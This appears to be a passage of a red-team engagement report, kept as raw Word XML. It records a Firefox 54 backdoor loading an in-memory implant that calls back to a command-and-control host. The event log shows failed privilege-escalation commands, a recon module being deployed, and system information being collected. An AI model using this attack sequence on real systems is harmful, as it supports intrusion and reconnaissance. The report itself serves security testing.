        <w:t>First attacked ta51-pivot-2 and deployed OC2, allowing us to run our attack from within the target network.  Exploited Firefox backdoor by browsing to our compromised host at http://128.55.12.233.  loaderDrakon was executed in Firefox memory and connected out to 128.55.12.233:8000 and 128.55.12.233:443 for C2.  Before the test, we observed that the hosts had been rebooted without disabling driver signature enforcement, meaning we would not be able to use our elevate drivers.  We tried to elevate anyway, but it failed as we expected.  We loaded the sys_info module to recon data from the system.  After we finished the test, we asked BBN to reboot the hosts 30 minutes later and disable driver signing so that we could re-run the test using privilege escalation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F8FA1B" w14:textId="7EACD9F4" w:rsidR="00FC027E" w:rsidRPr="00DC723B" w:rsidRDefault="00FC027E" w:rsidP="00DC723B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_q6lqfzdothsx" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="10" w:name="_Toc12599997"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidRPr="00DC723B">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Targets</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="549FD3AB" w14:textId="1C894A32" w:rsidR="00FC027E" w:rsidRPr="00DC723B" w:rsidRDefault="00DC723B" w:rsidP="00FC027E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ta51-pivot-2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00FC027E" w:rsidRPr="00DC723B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>128.55.12.233</w:t>
      </w:r>
      <w:r w:rsidR="00FC027E" w:rsidRPr="00DC723B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00FC027E" w:rsidRPr="00DC723B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00FC027E" w:rsidRPr="00DC723B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>Ubuntu 14.04</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12883CB0" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00DC723B" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC723B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ta52-windows-2</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC723B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00DC723B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>128.55.12.77</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC723B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00DC723B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00DC723B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>Windows 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8CDF31" w14:textId="7576525D" w:rsidR="00FC027E" w:rsidRPr="00DC723B" w:rsidRDefault="00FC027E" w:rsidP="00DC723B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_qd6uknfo8z1" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="12" w:name="_Toc12599998"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidRPr="00DC723B">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Capabilities</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="2A5B1792" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00DC723B" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC723B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Firefox 54.0.1 backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A3FB6F" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00DC723B" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC723B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Drakon APT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F17810" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00DC723B" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC723B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Sysinfo module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E97D420" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00DC723B" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC723B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Partial success, WMI failed due to some configuration issue on target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B1D96C" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00DC723B" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC723B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Elevate driver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEEB936" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00DC723B" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC723B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Failed because driver signing was not disabled after reboot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67441033" w14:textId="284D64AA" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_jgil2p9ceea3" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="14" w:name="_Toc12599999"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Event Log</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="392E6E9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2:58</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4555463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Benign activity opened Firefox and browsed to http://128.55.12.233</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737357A9" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AF6EAA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 New connection received ##################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D93DC4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windows] [x64] [N/A] [N/A]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C75AB8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Initializing new windows console</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1942A5A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 NEW CONSOLE READY [W1] ####################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD8B275" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1043095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3:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CA62D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whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3DAA5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admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BCB148" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EEA03A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3:01</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029AF81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pwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2D06D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C:\Users\admin\Documents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706D2B12" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="271A39C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3:01</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3426E12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getpid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529883E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pid: 2216</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40096D51" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44B396F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3:02</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B25F3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elevatepid '\\.\regmon' 2216</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFB754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levate process [\\.\regmon] [2216]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CF1CC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levate failed with status -1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8EEA8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Did you install the elevate driver before running the elevate command?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC85C1E" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6082B65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3:02</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119A712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elevatepid '\\.\sysmon' 2216</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF4234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levate process [\\.\sysmon] [2216]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF9945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levate failed with status -1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBD712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Did you install the elevate driver before running the elevate command?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AAB604" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B1590E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3:07</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65655C9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module sysinfo /e5/deploy/sysinfo.windows.x64.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9CEE4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module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6F190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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6020E52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   name  | library                            | deployed |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69041CC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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD0D1B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 sysinfo | /e5/deploy/sysinfo.windows.x64.dll |    0     |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F092D2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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E15C6FA" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="747F12D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3:07</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0216B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deploy sysinfo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2E8A9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Loading module /e5/deploy/sysinfo.windows.x64.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D88162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deploy success [sysinfo] [/e5/deploy/sysinfo.windows.x64.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C6B8B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 register success [sysinfo] [/e5/deploy/sysinfo.windows.x64.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA87F6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register success [sysinfo] [/e5/deploy/sysinfo.windows.x64.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2C33C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register success [sysinfo] [/e5/deploy/sysinfo.windows.x64.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CA932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register success [sysinfo] [/e5/deploy/sysinfo.windows.x64.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7C652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register success [sysinfo] [/e5/deploy/sysinfo.windows.x64.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4840B00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register success [sysinfo] [/e5/deploy/sysinfo.windows.x64.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74ACEA5B" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28A796A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3:08</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404B463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GetOSInfo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D21CC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sysinfo.GetOSInfo returned success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A7B65E" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A0C227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3:10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E92314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pwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59793DA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C:\Users\admin\Documents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3FB0E6" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="757230F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3:10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CE0DB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dir</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EFE032" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3478AE0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3:11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B9813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GetOSInfo C:\Users\admin\unexpected (C:\Users\admin\Documents\Usersadminunexpected)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9FBF3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sysinfo.GetOSInfo returned success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A76F0A7" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FFB0A7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3:12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCC476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dir</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DAFBCD" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12FABDB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3:12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384CF1F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cd ..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEA89EE" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12BA786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3:13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16AAEF4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dir</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AB208F" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E0CE1A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3:13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F394CA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GetAllInfo C:\users\admin\travesty (C:\Users\admin\usersadmintravesty)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443EC17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sysinfo.GetAllInfo returned success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368FE1EB" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48DAD45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3:13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1174B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lastRenderedPageBreak/>
        <w:t>W1&gt;dir</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB63E4E" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4081234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3:14</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35335F0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dir</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED1F354" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2770983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3:17</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258B258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cd Documents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662B9FC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dir</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329E9407" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08A1A37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3:19</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C09CF2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cat Usersadminunexpected</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5D9FE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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CB4CD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OS INFORMATION ------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035070C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BIOS Information --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40029E5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Name = </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F813D9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escription = </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C25578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Version = </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9B7EF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BIOS Information --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B62373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MotherBoard Information --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71ED64B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Name = </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3DA69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escription = </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472D785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Revision Number = </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366DF73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MotherBoard Information --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B11A5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Owner Information --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4C925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rimary Name = </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1097BEF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rimary Contact = </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2885167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Owner Information --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BCABA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Date/Time Information --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2512E5C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Current Time Zone = 0</w:t>
      </w:r>
    </w:p>
